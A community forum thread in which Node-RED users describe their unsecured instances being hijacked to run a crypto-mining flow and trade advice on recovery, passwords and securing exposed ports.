Security FAQ updated
Agreed. It's time NR was updated to require UN/PW on first use of the interface rather than asking novice users to jump out of the friendly UI and delve into settings.js via the command line; and the convoluted process of creating a hash that's not really a novice activity - I hope it should be simple to implement and would make all new installations safer out of the box, thus improve reputation despite people not taking enough care over their own IT security... It's great that NR appeals to the tech novice, just a shame it expects a level of technical competence to give it some basic security. At the very least it would be better if the settings.js was editable via the UI in a sensible way.
1 Like
That isn't what I am talking about. If you read my post again you will see I am referring to the system user and pwd, nothing to do with node red.
No, I just closed all ports. NR is not connected to the internet anymore
Yes I know. I was agreeing with your assessment of the improvements to the default Pi OS as installed. I was drawing, albeit clumsily, parallels that if Raspberry can do it, perhaps NR should to, after all NR is as much targeted at novices as much as is to experienced users.
Adding my recent experience to the conversation here. i had nodered running on a ubuntu VM and noticed it pegged the cpu at 100% usage which was unusual. A new flow called "spiderpig420" had been added and contained this
I poked around in the github and its primary purpose appears to be crypto mining.
the real head scratcher for me is how it got in. I don't have any ports opened for nodered through the firewall. there is an nginx reverse proxy that directs to wireguard for remote access.
I did make the big mistake of not securing nodered after i got done installing it.
I was also caught by by the NR password hack - open port and useless UN and PW on the Pi. Of course I first attempted to logon to NodeRed using the presented screen and tried a number of my commonly used names and passwords - could these have been transmitted to the perpetrator - was that the scam?
I dont think so but to be safe - change them.
The better answer is - dont use common user names and password 
(but you already know this)
More importantly, if any of the "common" ones you tried were your primary email - change that immediately and enable 2-factor auth if not already enabled.
Unfortunately, an Internet-facing VM MUST be secured before you let the Internet it. It just takes a few seconds for bots to come sniffing and there are plenty of vulnerabilities around that can let people in - though usually it is something very simple.
Also - DO NOT USE COMMON PORTS. If you do want to expose a node-red endpoint to the internet, make sure that it is using a common port such as 443. And of course, if you didn't have TLS (HTTPS) from the outset, you may already have compromised yourself by allowing unencrypted traffic.
Don't expose anything on port 1880 nor SSH on port 22. Use a random high numbered port for SSH and use 443 for TLS protected Node-RED endpoints if it is free, otherwise use 8443 or some other common port.
Reasonable security isn't generally that hard but it does take careful attention to detail. Good or excellent security on the other hand is fiendishly hard to get right and trivially easy to get wrong.
3 Likes
you are absolutely correct. While this was not too bad to recover from, it serves as a good reminder to stay on top of the basics. could have been much worse.
2 Likes
I believe I too have been compromised. I noticed a day or two ago that some of my Node Red Dashboards and HTML webpages were not updating properly. I am working remotely (1500 miles) from the location of my RPi's.
I signed into my home PC via TeamViewer and then signed into each of my RPi's via SSH and rebooted them. I then was presented with the pop-up's asking for UID and PWD for each of the Node-Red and Dashboard webpages, both locally (via TeamViewer) and remotely over the internet. Although I had not used UID/PWD credentials for this type of access previously, I tried my RPi's UID and PWD (pi and non-standard pwd) before suspecting something was wrong.
I then SSH'd into one of my RPi's locally (via TeamViewer) and looked at the Node Red setting.js file. It contained the credentials section with 'admin', xxxx . I looked on the internet and found this post.
I use non-standard ports for remote access and I use a non-standard pi password but since I have likely been hacked, is there anything I can do to restore my RPi's before I get home (a month from now), or am I best to just shut them down, remotely, altogether?
They facilitate my home monitoring and control my home lights, so would really like to get back to 'normal' somehow until I get home and can make things more secure.
sorry to hear about your situation.
do you know the most likely point of entry that allowed someone into the system? if so are you able to plug those holes? if you cannot determine the point of failure and /or are unable to resolve it first, then i would stop there and shut the whole thing down.
I have shut Node Red down on each of the Pi's for now while I investigate further.
I don't know the point of entry; the open ports were in the 8000 range.
did you have a password protecting the editor / admin api?
Just the pi user pwd.
Thanks for your help.
(off to bed; PDT here)
i am far (far far far) from an expert on this..but i would make sure to go through this
https://nodered.org/docs/user-guide/runtime/securing-node-red
also consider using something like pivpn to give yourself a better path in.
It appears that the bot is searching not only the standard port but others too. Were you using 8880 by any chance?
I am afraid all you can do is erase the SD cards and restore from your backup and put it down to experience.
The attack seems to have got into your Pi via the Node-red editor. Your pi username and password were probably never used.
However, Node-red was just the point of entry. We have seen that the atack downloads and executes a binary file. We have no idea what else that might have done, but it's not unreasonable to imagine that it would have tried to identify and attack other devices on your network.
We know about the attack this time because it set the Node-red admin user name and password.
But we can't be sure this was the first time the attacker has been in your network.
As @dceejay says above: "at this point I would assume other parts of your machine have been compromised - and that it would be unsafe to continue to use it without completely wiping the SD card and starting again."
I hope the developers are thinking of ways to keep users with Node-red on small computers from using it unsafely in future.
EXACTLY. I am hardly a novice user and have had my NR instance exposed to the internet for probably five years now. Like others here, i have been similarly hacked this past weekend (Oct. 15). Even with big warnings, etc., I had done nothing due to the complexities and gobbldigook sounding stuff required to set up security. My SD card has been removed and a new image started that for now is not internet exposed. Maybe some long, cold, snowy day in the winterā¦
I think the application should not have public access. A lot of applications are not safe per se and that is why you DO NOT put anything in the internet directly. The exception is if you know what you're doing but then again you wouln't put it on the internet 
